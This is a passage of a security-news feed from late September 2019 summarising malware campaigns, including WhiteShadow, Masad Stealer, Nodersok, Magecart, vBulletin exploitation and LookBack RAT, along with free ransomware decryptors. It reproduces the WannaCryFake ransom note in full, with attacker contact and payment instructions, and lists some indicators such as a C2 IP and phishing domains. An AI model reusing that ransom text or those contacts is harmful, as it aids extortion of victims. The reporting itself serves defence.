“Due to the lack of traversal, propagation, or destructive capabilities at the time of analysis, it is assessed with moderate confidence that this malware may not become popular with high-value and highly capable actors. However, because users can buy the source code, it is possible that we may see other threat actors reusing the malware and creating their own variant of Arcane V, as has been done with other popular malware families, like njRAT.”

Pierluigi Paganini

(SecurityAffairs – Arcane Stealer V, malware)

The post Arcane Stealer V, a threat for lower-skilled adversaries that scares experts appeared first on Security Affairs.

Security Affairs newsletter Round 233

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs



Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

0patch will provide micropatches for Windows 7 and Server 2008 after EoS
Critical flaws affect Jira Service Desk and Jira Service Desk Data Center
Facebook suspends tens of thousands of apps from hundreds of developers
Campbell County Memorial Hospital in Wyoming hit by ransomware attack
Portugues hacker faces hundreds of Charges in Football Leaks case
Portuguese hacker faces hundreds of Charges in Football Leaks case
Privilege Escalation flaw found in Forcepoint VPN Client for Windows
Thinkful forces a password reset for all users after a data breach
TortoiseShell Group targets IT Providers in supply chain attacks
A new Fancy Bear backdoor used to target political targets
APT or not APT? Whats Behind the Aggah Campaign
Hacker discloses details and PoC exploit code for unpatched 0Day in vBulletin
Microsoft released an out-of-band patch to fix Zero-day flaw exploited in the wild
North Korea-linked malware ATMDtrack infected ATMs in India
Adobe Patches two critical vulnerabilities in ColdFusion
Czech Intelligence ‘s report attributes major cyber attack to China
Heyyo dating app left its users data exposed online
US Utilities Targeted with LookBack RAT in a new phishing campaign
Airbus suppliers were hit by four major attack in the last 12 months
Botnet exploits recent vBulletin flaw to protect its bots
Emsisoft releases a free decryptor for the WannaCryFake ransomware
Study shows connections between 2000 malware samples used by Russian APT groups
USBsamurai for Dummies: How To Make a Malicious USB Implant & Bypass Air-Gapped Environments for 10$. The Dumb-Proof Guide.
Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips
DoorDash Data Breach exposes data of approximately 5 million users
Emsisoft released a new free decryption tool for the Avest ransomware
Magecart 5 hacker group targets L7 Routers
After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk
German police arrest suspects in raid network hosting Darknet marketplaces
Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada
Nodersok malware delivery campaign relies on advanced techniques

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 233 appeared first on Security Affairs.

WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

Researchers at Proofpoint have spotted a piece of downloader, dubbed WhiteShadow, that leverages Microsoft SQL queries to pull and deliver malicious payloads. 

In August, malware researchers at Proofpoint spotted a new downloader which is being used to deliver a variety of malware via Microsoft SQL queries. The experts detected new Microsoft Office macros, which collectively act as a staged downloader, and tracked it as WhiteShadow.

Initially the downloader was involved in a small campaign aimed at distributing the Crimson RAT, over the time researchers observed the implementation of detection evasion techniques.

“In August 2019, the macros that make up WhiteShadow appeared in English-language cleartext. The only observed obfuscation technique was in the simple case altering of strings such as “Full_fILE” or “rUN_pATH.” In early September, we observed slight misspellings of certain variables such as “ShellAppzz.Namespace(Unzz).” Mid-September brought another change in macro code using reversed strings such as “StrReverse(“piz.Updates\stnemucoD\”)”.” reads the analysis published by Proofpoint.

“The most recently observed versions of the WhiteShadow macros contain long randomized text strings such as “skjfhskfhksfhksfhksjfh1223sfsdf.eDrAerTerAererer”.”

Experts believe that WhiteShadow is one component of a malware delivery service that includes a rented instance of Microsoft SQL Server to host various payloads retrieved by the downloader. Experts observed the downloader in campaigns spreading Crimson RAT, Agent Tesla, AZORult, and multiple keyloggers.

The macros observed in the campaigns, once enables, execute SQL queries to retrieve the malicious code, stored as ASCII-encoded strings, from Microsoft SQL Server databases controlled by threat actors. 

The result of the query is written to disk as a PKZip archive of a Windows executable. 

WhiteShadow uses a SQLOLEDB connector to connect to a remote Microsoft SQL Server instance, execute a query, and save the results to a file in the form of a zipped executable. The SQLOLEDB connector is an installable database connector from Microsoft but is included by default in many (if not all) installations of Microsoft Office.” continues the report.

“Once extracted by the macro, the executable is run on the system to start installing malware, which is determined by the actor based on the script configuration stored in the malicious Microsoft Office attachments.”

whiteshadow

Proofpoint warns that the Microsoft SQL technique is still a rarity in the threat landscape, but threat actors could increasingly adopt it in future campaigns. 

Pierluigi Paganini

(SecurityAffairs – WhiteShadow, malware)

The post WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware appeared first on Security Affairs.

Masad Stealer Malware exfiltrates data via Telegram

Experts at Juniper Threat Labs have discovered a new piece of malware dubbed Masad Stealer that exfiltrates cryptocurrency wallet files via Telegram.

Security researchers at the Juniper Threat Labs discovered a strain of malware dubbed Masad Stealer that is actively distributed. The malware could steals files, browser information, and cryptocurrency wallet data and send them to the botmasters using a Telegram.

“The malware is being advertised on black market forums as “Masad Clipper and Stealer”. It steals browser data, which might contain usernames, passwords and credit card information. Masad Stealer also automatically replaces cryptocurrency wallets from the clipboard with its own.” reads the analysis published by the experts.

Masad Stealer sends all of the information it collects – and receive commands from – a Telegram bot controlled by the threat actor deploying that instance of Masad. Because Masad is being sold as off-the-shelf malware, it will be deployed by multiple threat actors who may or may not be the original malware writers.”

The Masad Stealer is written in Autoit scripts and is compiled into a Windows executable. The size of most of the samples analyzed by the experts was about 1.5 MiB, but experts revealed that it is possible to find larger executables bundled into other applications. 

The malware appears to be linked to another threat dubbed “Qulab Stealer”. 

Crooks are advertising the malware on hacking forums as a stealer and clipper, the ‘fully-featured’ variant is offered for sale at $85.

Masad Stealer is distributed masquerading it as a legitimate tool or bundling it into third party tools, such as CCleaner and ProxySwitcher.

Attackers attempt to trick users into downloading the malware by advertising it in forums, on third party download sites or on file sharing sites.

Victims can also get infected installing tainted versions of popular software and game cracks, and cheats.

Once infected a machine, Masad Stealer will collect a wide range of data, including system info, screenshots, desktop text files, Steam Desktop Authenticator sessions, Cryptocurrency Wallets, browser cookies, usernames, passwords, and Credit Card Browser Data.

Masad Stealer is also able to automatically replaces MoneroBitcoin Cash, Litecoin, Neo, and Web Money cryptocurrency wallets from the clipboard with its own.

The malware achieves persistence by creating a scheduled task on all Windows devices it manages. 

Once the malware has collected the information from the victims’ computers will zip them using a 7zip executable bundled within its binary, then it will exfiltrat the data to the command and control (C2) server using unique Telegram bot IDs.

The analysis of unique Telegram bot IDs and usernames associated to the malware allowed the experts to determine that there are at least 18 threat actors or campaigns actively targeting potential victims with the Masad Stealer.

“Of the more than 1,000 samples we identified to be variants of this malware, there where 338 unique Telegram Command and Control bot IDs. From this data, we can estimate the number of threat actors – or at least the number of different campaigns being run using the Masad Stealer malware – and the size of their operations.” continues the report.

Juniper Threat Labs pointed out that Masad Stealer is an active threat and the malicious code is still available for purchase on the black market.

Experts also published a list of indicators of compromise (IOCs) with malware sample hashes and domains involved in the attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post Masad Stealer Malware exfiltrates data via Telegram appeared first on Security Affairs.

Nodersok malware delivery campaign relies on advanced techniques

Microsoft researchers observed a campaign delivering malware, dubbed Nodersok, relying on advanced techniques and elusive network infrastructure.

Microsoft experts observed a malware campaign, tracked as Nodersok, relying on advanced techniques and elusive network infrastructure. Microsoft uncovered the campaign in mid-July when noticed patterns in the anomalous usage of MSHTA.exe.

Nodersok abuse of legitimate tools also called living-off-the-land binaries (LOLBins). Researchers observed threat actors dropping two legitimate tools onto the infected machines, namely Node.exe, the Windows implementation of the popular Node.js framework, and WinDivert, a network packet capture and manipulation utility.

“It’s not uncommon for attackers to download legitimate third-party tools onto infected machines (for example, PsExec is often abused to run other tools or commands).” reads the analysis published by Microsoft. “However, Nodersok went through a long chain of fileless techniques to install a pair of very peculiar tools with one final objective: turn infected machines into zombie proxies.”

The Nodersok campaign has already infected thousands of machines in the last several weeks. Most of the victims are located in the United States and Europe, they are predominantly consumers. About 3% of the infected systems belong to organizations in different sectors, including education, professional services, healthcare, finance, and retail.

Nodersok campaign

The attack chain starts when the users run an HTML Application (HTA) that is delivered likely through compromised advertisements. The JavaScript code in the HTA file downloads a second state component that launches a Powershell.

The Powershell command downloads additional components. One of the second-stage instances of PowerShell downloads the legitimate node.exe tool, while another drops WinDivert packet capture library components.

Another PowerShell component runs a shellcode to use WinDivert for the filtering and modification of certain outgoing packets.

The final payload turns the infected machine into a proxy.

The attackers leverage lksktWinDivert tool is used to intercept packets sent out to initiate a TCP connection and modify them in a manner that likely benefits the attackers.

“Both the distributed network infrastructure and the advanced fileless techniques allowed this campaign fly under the radar for a while, highlighting how having the right defensive technologies is of utmost importance in order to detect and counter these attacks in a timely manner.” Microsoft concludes.

“If we exclude all the clean and legitimate files leveraged by the attack, all that remains are the initial HTA file, the final Node.js-based payload, and a bunch of encrypted files. Traditional file-based signatures are inadequate to counter sophisticated threats like this.”

Pierluigi Paganini

(SecurityAffairs – Nodersok, hacking)

The post Nodersok malware delivery campaign relies on advanced techniques appeared first on Security Affairs.

Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada

A series of cyber attacks hit the defense contractors Rheinmetall AG and Defence Construction Canada (DCC) causing the disruption of their information technology systems.

This month a series of cyber attack hit defense contractors Rheinmetall AG and Defence Construction Canada (DCC) disrupting their information technology systems.

German Rheinmetall AG is a market leader in the supply of military technology, in 2019 the group generated sales of $6.9 billion. DCC is a Crown corporation that delivers infrastructure and environmental projects for the defence of Canada

A malware-based attacks hit the IT infrastructure of Rheinmetall Automotive plants in Brazil, Mexico, and the USA since late on the evening of 24 September 2019.

The attacks impacted the production processes at these plants causing significant disruption.

“The IT infrastructure of Rheinmetall Automotive plants in Brazil, Mexico and the USA has been affected by malware attacks since late on the evening of 24 September 2019. As a result, normal production processes at these locations are currently experiencing significant disruption.” reads a press release published by the company.

“According to the latest information, the Group’s other IT systems have not been affected.”

Rheinmetall AG claims it is doing everything in its power to address the resulting disruption.

The company said assured deliverability in the short term, but at the time it is not possible to predict the length of the disruption.

“The most likely scenarios suggest a period lasting between two and four weeks.” continues the press release. “As things stand, the Group expects the malware event to have an adverse impact on operating results of between €3 million and €4 million per week starting with week two.”

Early this month, a cyberattack also disrupted the information technology systems of Defence Construction Canada.

“The Crown Corporation that manages Defence department projects and infrastructure has been hit with a cyber-attack.” reported the Ottawa Sun interview.

“Industry sources say an attack earlier this month disrupted Defence Construction Canada’s computer systems and has led to ongoing issues with procurement and other projects.”

DCC is still working to restore the IT systems and launched an investigation in the cyber attack, the organization pointed out that there are no delays to projects that it is managing on behalf of DND.

“All DCC site offices across Canada are open and work has continued on all projects that DCC is managing on behalf of DND and its other clients, she noted in an email.” continues the post.

“There are no delays to projects that DCC is managing on behalf of DND due to this incident,” said Stephanie Ryan, director of communications with Defence Construction Canada.

At the time there are no technical details about both cyber attacks, experts believe that the systems were infected by ransomware that caused the disruption of internal operations.

Pierluigi Paganini

(SecurityAffairs – Rheinmetall, hacking)

The post Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada appeared first on Security Affairs.

Threat Roundup for September 20 to September 27

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sep. 20 to Sep 27. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU272019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Divergent Malware Using NodeJS, WinDivert in Fileless Attacks

Samples of a new malware family called “Divergent” are using both NodeJS and WinDivert in a series of fileless attack campaigns. Cisco Talos didn’t identify the exact delivery method for Divergent. Even so, its researchers observed that the samples they analyzed staged and stored configuration date on the registry like other fileless malware. They also […]… Read More

The post Divergent Malware Using NodeJS, WinDivert in Fileless Attacks appeared first on The State of Security.

Magecart 5 hacker group targets L7 Routers

IBM researchers observed one of the Magecart groups using a malicious code to inject into commercial-grade layer 7 L7 routers.

IBM X-Force Incident Response and Intelligence Services (IRIS) experts observed that one of the Magecart groups, tracked as MG5, is using malware to inject into commercial-grade L7 routers.

The experts believe the hackers are likely testing malicious code designed for injection into benign JavaScript files loaded by L7 routers that are typically used by airports, casinos, hotels, and resorts. According to IBM, the threat actors are currently targeting users shopping on U.S. and Chinese websites.

The experts discovered that the Magecart hackers are able to inject credit card skimmer into a popular open-source JavaScript library that websites use to ensure wide compatibility with mobile browsing.

we found that MG5 has likely devised an attack scenario in which it could inject its malicious payment card stealing code into a popular open-source JavaScript library. This open-source code is provided as a free, licensed tool designed to help make websites compatible with mobile browsing.” reads the analysis published by IBM.”By infecting that code, MG5 can potentially infect and compromise the data of mobile device users that install booby-trapped apps and then shop online.”

The experts speculate the attackers have prepared code for injection into a specific type of commercial-class L7 router, they pointed out that no vendor compromise has been observed so far.

L7 routers implement both routing and switching capabilities, an attacker that compromises the network devices could potentially perform several malicious activities, such as traffic hijacking.

The router can be installed in the same virtualization server as other business-critical IT infrastructure components, this means that once compromised could be used by hackers for lateral movements.

The Wi-Fi connectivity is usually offered for free in locations such as hotels that prefer to outsource the Wi-Fi service, but most vendors for Wi-Fi service do not support proxying adverts or JavaScript injection.

“Having access to a large number of captive users with very high turnover — such as in the case of airports and hotels — is a lucrative concept for attackers looking to compromise payment data.”continues IBM. “We believe that MG5 aims to find and infect L7 router libraries with malicious code and possibly inject malicious ads that captive users must click on to eventually connect to the internet.”

Attackers can compromise L7 routers to steal guest payment data from the users the browse websites through the compromised network device, they can also inject malicious ads into webpages viewed by all connected guest devices.

IBM experts also believe that the Magecart hackers have infected open-source mobile app code that’s offered to app developers for free.

“Another finding from X-Force IRIS with regards to code being tested by Magecart Group 5 concerns open-source mobile app code that’s offered to app developers for free. The code provides a library-agnostic touch slider to allow developers to build touch galleries for their app projects.” concludes the report.

“MG5 has likely infected this code, corrupting it as its source to ensure that every developer using the slider will end up serving the attackers’ malicious code, leading to the compromise of data belonging to those using the finished product,”.

The report also includes mitigation tips to prevent access to data.

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post Magecart 5 hacker group targets L7 Routers appeared first on Security Affairs.

Microsoft Warns of a New Rare Fileless Malware Hijacking Windows Computers

Watch out Windows users! There's a new strain of malware making rounds on the Internet that has already infected thousands of computers worldwide and most likely, your antivirus program would not be able to detect it. Why? That's because, first, it's an advanced fileless malware and second, it leverages only legitimate built-in system utilities and third-party tools to extend its

Emsisoft released a new free decryption tool for the Avest ransomware

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days after the release of WannaCryFake decryptor.

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days ago the researchers also released a free decryptor for the WannaCryFake ransomware.

The Avest ransomware encrypts victim’s files and appends the extension “.ckey().email().pack14” to the filename.

Below the text of the ransom note “!!!Readme!!!Help!!!.txt” that the ransomware drops on the infected systems:

"Problems with your data? Contact us: data1992@protonmail[.]com key: <victim specific>”

The decryption tool could be used by the victims only after they have successfully removed the malware from their system to avoid that the Avest ransomware will repeatedly lock the machine or will encrypt files.

“The decryptor requires access to a file pair consisting of one encrypted file and the original, unencrypted version of the encrypted file to reconstruct the encryption keys needed to decrypt the rest of your data.” reads the user guide published by Emsisoft. “Please do not change the file names of the original and encrypted files, as the decryptor may perform file name comparisons to determine the correct file extension used for encrypted files on your system.”

Victims of the Avest ransomware can download the decryptor tool here:

https://www.emsisoft.com/ransomware-decryption-tools/avest

In August, security researchers at Emsisoft released a decryptor tool that allows the victims of the JSWorm 4.0 ransomware to decrypt their files for free. In May Emsisoft experts released a free Decrypter tool for the JSWorm 2.0 variant.

In July the company released other free decryptors for the LooCipher ransomware, the ZeroFucks ransomware, and the Ims00rry ransomware.

Pierluigi Paganini

(SecurityAffairs – Avest ransomware, hacking)

The post Emsisoft released a new free decryption tool for the Avest ransomware appeared first on Security Affairs.

Year-over-year malware volume increased by 64%

The most common domains attackers use to host malware and launch phishing attacks include several subdomains of legitimate sites and Content Delivery Networks (CDNs) such as CloudFlare.net, CloudFront.net (which belongs to Amazon), SharePoint and Amazonaws.com, along with legitimate file-sharing websites like my[.]mixtape[.]moe, according to WatchGuard. The report for Q2 2019 also highlights that modules from the popular Kali Linux penetration testing tool made the top ten malware list for the first time. Trojan.GenericKD, which covers … More

The post Year-over-year malware volume increased by 64% appeared first on Help Net Security.

Botnet exploits recent vBulletin flaw to protect its bots

Security expert Troy Mursch of Bad Packets reported that a botnet is exploiting the recently disclosed vBulletin exploit to block other attackers from also using it.

The security expert Troy Mursch observed a botnet that it utilizing the recently disclosed vBulletin exploit to secure vulnerable servers to avoid that can be compromised by other threat actors. This technique is not new and allows botmaster to preserve their own botnet.

Early this week, an anonymous security researcher publicly disclosed a zero-day remote code execution flaw, tracked as CVE-2019-16759, in the vBulletin forum software and the exploit code to trigger it.

vbulletin

The vulnerability could be exploited remotely by an unauthenticated attacker. The PoC exploit published by the hacker works on vBulletin versions 5.0.0 till the latest 5.5.4.

The zero-day flaw in the forum software resides in the way an internal widget file of the forum software package accepts configurations via the URL parameters. The expert discovered that the package fails to validate the parameters, an attacker could exploit it to inject commands and remotely execute code on the vulnerable install.

The threat actor behind the botnet uses the exploit to hack into vulnerable servers, then configures them to require a password to execute commands.

The above images show how the attacker modifies the source code in the includes/vb5/frontend/controller/bbcode.php file in order to request a password for the command execution. The above image also shows the password used by the botmaster to protect the systems he had infected, this means that another attacker could use it to send commands to the system.

According to Mursch, most of the attacks come from Brazil, Vietnam, and India.

Chaouki Bekrar, founder and CEO of the Zerodium exploit broker, confirmed that the vBulletin flaws has been privately circulating for years.

“The availability of a working exploit is aggravated by another publicly posted script that uses the Shodan search site to find vulnerable servers. Attackers can use it to generate a list of vBulletin sites that are susceptible and then use the exploit to take them over.” reported Ars Technica.

Pierluigi Paganini

(SecurityAffairs – vBulletin, hacking)

The post Botnet exploits recent vBulletin flaw to protect its bots appeared first on Security Affairs.

Outlook for Web Bans 38 More File Extensions in Email Attachments

Malware or computer virus can infect your computer in several different ways, but one of the most common methods of its delivery is through malicious file attachments over emails that execute the malware when you open them. Therefore, to protect its users from malicious scripts and executable, Microsoft is planning to blacklist 38 additional file extensions by adding them to its list of file

5G and IoT: How to Approach the Security Implications

Experts from Nokia, iboss and Sectigo talk 5G mobile security for internet of things (IoT) devices in this webinar YouTube video (transcript included).

WordPress sites hacked through defunct Rich Reviews plugin

An estimated 16,000 websites are believed to be running a vulnerable and no-longer-maintained WordPress plugin that can be exploited to display pop-up ads and redirect visitors to webpages containing porn, scams, and–worst of all–malware designed to infect users’ computers. Researchers at WordFence went public about how hackers are exploiting a zero-day vulnerability in a third-party […]… Read More

The post WordPress sites hacked through defunct Rich Reviews plugin appeared first on The State of Security.

Study shows connections between 2000 malware samples used by Russian APT groups

A joint research from Intezer and Check Point Research shows connections between nearly 2,000 malware samples developed by Russian APT groups.

A joint research from Intezer and Check Point Research shed light on Russian hacking ecosystem and reveals connections between nearly 2,000 malware samples developed by Russian APT groups.

The report is extremely interesting because gives to the analysts an overview of the Russian hacking community and their operations.

The experts also published an interactive map that gives a full overview of this Russian hacking ecosystem.

Since the first publicly known attacks by Moonlight Maze, in 1996, many Russian hacking groups have emerged in the threat landscape, their operations involved highly sophisticated malware and hacking techniques.

“Russia is known to conduct a wide range of cyber espionage and sabotage operations for the last three decades. Beginning with the first publicly known attacks by Moonlight Maze, in 1996, the Pentagon breach in 2008, Blacking out Kyiv in 2016, hacking the United States elections in 2016, and including some of the largest, most infamous cyberattacks in history, targeting an entire nation with NotPetya ransomware.” states the report.

“This led us to gather, classify, and analyze thousands of Russian APT malware samples in order to find connections not only between samples, but also between different families and actors.”

Russian APT Map

The Russian hacking ecosystem characterized by Russian APT groups is very complex, security firms have collected a huge quantity of information related to single threat actors, but not of them provided a global picture of the ecosystem.

Give a look at the “Russian APT Map,” that illustrates the connections between different Russian APT malware samples, malware families, and threat actors.

Russian APT MAP

Experts analyzed approximately 2,000 samples that were attributed to Russian APT groups, the researchers found 22,000 connections between the samples, in addition to 3.85 million non-unique pieces of code that were shared. The study classified the samples into 60 families and 200 different modules.

“Every actor or organization under the Russain APT umbrella has its own dedicated malware development teams, working for years in parallel on similar malware toolkits and frameworks. Knowing that a lot of these toolkits serve the same purpose, it is possible to spot redundancy in this parallel activity.” continues the report.

“These findings may suggest that Russia is investing a lot of effort into its operational security. By avoiding different organizations re-using the same tools on a wide range of targets, they overcome the risk that one compromised operation will expose other active operations.”

Experts also released a signature-based tool to scan dubbed Russian APT Detector a host or a file against the most commonly re-used pieces of code used by the Russian APT groups in their operations.

Enjoy the report!

Pierluigi Paganini

(SecurityAffairs – Russian APT, hacking)

The post Study shows connections between 2000 malware samples used by Russian APT groups appeared first on Security Affairs.

Emsisoft releases a free decryptor for the WannaCryFake ransomware

Researchers at Emsisoft security firm have released a new free decryption tool for the WannaCryFake ransomware.

Good news for the vicitms of the WannaCryFake ransomware, researchers at Emsisoft have released a FREE decryption tool that will allow decrypting their data.

WannaCryFake is a piece of ransomware that uses AES-256 to encrypt a victim’s files. The ransomware appends the following file extension to encrypted file:

“.[<id>][recoverydata54@protonmail.com].WannaCry”

“According to the ransomware distributors, the price of decryption depends on how quickly you email them, but under no circumstances should you attempt to make contact.” states the port published by Emsisoft.

The ransom note dropped by the WannaCryFake ransomware states:

All your files have been encrypted!

All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail recoverydata54@protonmail.com

also You can use telegram ID:@data54

You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files.

Free decryption as guarantee

Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 4Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)

How to obtain Bitcoins

The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click ‘Buy bitcoins’, and select the seller by payment method and price.

Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/

Jabber client installation instructions:

Download the jabber (Pidgin) client from https://pidgin.im/download/windows/

After installation, the Pidgin client will prompt you to create a new account.

Click “Add”

In the “Protocol” field, select XMPP

In “Username” – come up with any name

In the field “domain” – enter any jabber-server, there are a lot of them, for example – exploit.im

Create a password

At the bottom, put a tick “Create account”

Click add

If you selected “domain” – exploit.im, then a new window should appear in which you will need to re-enter your data:

Userpassword

You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below)

If you don’t understand our Pidgin client installation instructions, you can find many installation tutorials on youtube – https://www.youtube.com/results?search_query=pidgin+jabber+install

Attention!

Do not rename encrypted files.

Do not try to decrypt your data using third party software, it may cause permanent data loss.

Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Victims of the malware can download the WannaCryFake Decryptor here.

“Regardless of what the ransom note might say, our decryption tool can help you recover your files for free and will not cause permanent data loss. Please get in touch with our support team if you have any questions.” concludes Emsisoft.

In August, security researchers at Emsisoft released a decryptor tool that allows the victims of the JSWorm 4.0 ransomware to decrypt their files for free. In May Emsisoft experts released a free Decrypter tool for the JSWorm 2.0 variant.

In July the company released other free decryptors for the LooCipher ransomware, the ZeroFucks ransomware, and the Ims00rry ransomware.

Pierluigi Paganini

(SecurityAffairs – ransomware, hacking)

The post Emsisoft releases a free decryptor for the WannaCryFake ransomware appeared first on Security Affairs.

Investing in Enterprise security is a necessity, not a luxury

Estimated reading time: 3 minutes

In the current ‘digital-first’ environment that organizations and businesses operate nowadays, success and failure can often depend on enterprise security solutions. Businesses operate in an environment where the threats from the digital sphere can often outweigh the threats from a physical sphere. The list of threats is huge and ever-expanding – malware, phishing, ransomware, cryptojacking, data breach, hacks, financial fraud, password loss and a lot more.

Neglecting cybersecurity has both financial and reputational damages. A study estimated that the average cost of a data breach rose 12% over the last few years to a staggering $3.92 million. And as some of the biggest organizations in the world like Equifax, Marriott International and Yahoo realized, threats have repercussions on brand value as well, affecting customer trust and reputation in a way that may not be possible to value monetarily but certainly leave a lasting impact.

That is why an increasing amount of organizations are waking up to the fact that enterprise security is no longer just an investment – it is a necessity and a requirement in today’s day and age.

Global research and advisory firm Gartner estimated that worldwide information security spending would exceed $124 billion in 2019.

How does treating enterprise security help benefit an organization? There are many ways but some of the most important ones are:

  1. Your data is substantially safer

No organization is completely safe – cybersecurity is one of those sectors where every second, there are new threats to the organization. Such an environment demands to have a strong enterprise security framework to keep organizations safe.

Most cybercriminals use basic tools and strategies which are already identified and blocked by most enterprise security solutions helping your data, your businesses and your employees stay safe from cybercrimes. In fact, Seqrite’s range of enterprise security solutions allows administrators to see the number of breach attempts and different cyber threats repelled to understand how the enterprise is staying better protected.

  1. Helps to meet compliance and regulatory requirements

For any organization operating in the digital world, there are various regulations, depending on where the enterprise is operating from and which countries its customers are based in, that one needs to comply to.

Non-compliance with these regulations (GDPR, HIPAA, PCI DSS, etc.) can result in hefty fines – in extreme cases even destroy businesses. But enterprises who have utilized a cybersecurity solution will be in a much better position to meet compliance and regulatory requirements.

  1. Build cyber trust

The impact of cyber attacks can be disastrous – affected reputation, decrease in customer base, legal liabilities etc. are all by-products that can undo the great work done by SMBs, SOHOs & enterprises and possibly floor these businesses.

Enterprises need to work hard to avoid this kind of a situation and win the trust of their users and stakeholders by ensuring them that they are taking the best possible measures to keep data safe. Once stakeholders and customers are convinced that the organization they are interacting with and entrusting with for their valuable data are serious about keeping it safe with the help of enterprise security, it helps to build trust and can be a key differentiator in customer loyalty.

  1. Preventing the loss of business

An enterprise that suffers a data breach or cyber attack suffers a loss in business. Client data is compromised, confidential data may be leaked and the data, if backed up, may take months to recover. In the worst-case scenario, if data is not backed up, it may be irretrievable.

All these contribute to a major loss of business for an enterprise which they can avoid to a certain extent by investing in an enterprise security framework.

Organizations can consider solutions like Seqrite’s Endpoint Security, a simple and comprehensive platform to protect enterprise networks from advanced threats, and Unified Threat Management, a one-stop solution for all enterprise security needs.

The post Investing in Enterprise security is a necessity, not a luxury appeared first on Seqrite Blog.

US Utilities Targeted with LookBack RAT in a new phishing campaign

Security experts at Proofpoint observed a new wave of phishing attacks aimed at US Utilities in an attempt to deliver the LookBack RAT.

Security experts at Proofpoint have discovered a new series of phishing attacks targeting entities US utilities in an attempt to deliver the LookBack RAT.

In early August, the expert reported that between July 19 and July 25, 2019, several spear-phishing emails were identified targeting three US companies in the utility sector. The phishing messages were impersonating a US-based engineering licensing board with emails originating from what appears to be an actor-controlled domain, nceess[.]com. Nceess[.]com is believed to be an impersonation of a domain owned by the US National Council of Examiners for Engineering and Surveying. Threat actors weaponized Word documents used to download and execute the LookBack RAT, a new remote access Trojan (RAT).

Now ProofPoint experts warn of a new wave of attacks carried out between August 21 and August 29, the threat actors targeted other organizations in the same sector. This time the attackers used phishing emails impersonating a licensing body related to the utilities sector.

The experts reported that at least 17 entities in the US utilities sector have been targeted by these attackers from April 5 through August 29, 2019.

“The phishing emails originated from what appears to be an actor-controlled domain: globalenergycertification[.]net. This domain, like those used in previous campaigns, impersonated a licensing body related to the utilities sector.reads the post published by Proofpoint. “In this case, it masqueraded as the legitimate domain for Global Energy Certification (“GEC”). The emails include a GEC examination-themed body and a malicious Microsoft Word attachment that uses macros to install and run LookBack.”

The tactics, techniques, and procedures (TTPs) observed in these attacks are consistent with phishing campaign reported in early August.

The analysis of the attacks allowed the researchers to uncover a reconnaissance activity conducted prior to the launch of the phishing campaigns. The attackers used a staging IP, the scanning targeted SMB over IP via port 445 for up to two weeks prior to the sending of the phishing emails.

“This is a newly identified TTP not disclosed in our initial publication regarding LookBack.” continues the post. “Observed scanning IPs in some instances have also hosted phishing domains prior to their use in phishing campaigns.”

The phishing messages were sent from an email address at the domain globalenergycertification[.]net in the attempt to trick victims into believing that they were sent by the official GEC website. The malicious messages invited recipients to take the GEC exam administered by the Energy Research and Intelligence Institution.

The weaponized attachments titled “take the exam now.doc” contained VBA macros to install LookBack, the macro is quite similar to the one involved in the previous campaign. The phishing emails also had a legitimate and benign PDF file attached. Designed for exam preparation, the PDF was hosted on the legitimate GEC site.

Once the victim opened the attachment, the macro installs several privacy-enhanced mail (PEM) files on the host that are both malware modules and macro variables.

The macro drops a version of certutil.exe on to the victim’s machine , and leverages it to decode the following initial files:

  • Pense1.txt contains variables specific to the creation of the GUP proxy tool
  • Pense2.txt pertains to the libcurl.dll downloader
  • Pense3.txt appears to be run alongside pense2.txt.

Experts observed that threat actors modified the macros in the recent attacks, they added additional variables likely in the attempt obfuscating the code. The C&C server used in this campaign was 103.253.41[.]45, that is the same used by the threat actors in the previous attacks.

“The evolution of TTPs including updated macros demonstrates a further departure from tactics previously employed by known APT groups. However, at the current moment, the creators of LookBack malware are yet to depart from their persistent focus on critical infrastructure providers in the United States,” Proofpoint concludes.

Pierluigi Paganini

(SecurityAffairs – LookBack RAT, hacking)

The post US Utilities Targeted with LookBack RAT in a new phishing campaign appeared first on Security Affairs.

A new Fancy Bear backdoor used to target political targets

Security experts at ESET have uncovered a new campaign carried out by Russia-linked Fancy Bear APT group aimed at political targets.

Security researchers at ESET have uncovered a new campaign carried out by Russia-linked Fancy Bear APT group (i.e. APT28, Sednit, Sofacy, Zebrocy, and Strontium) aimed at political targets.

In the recent attacks, the hackers used a new set of malicious payloads, including a backdoor written in a new language.

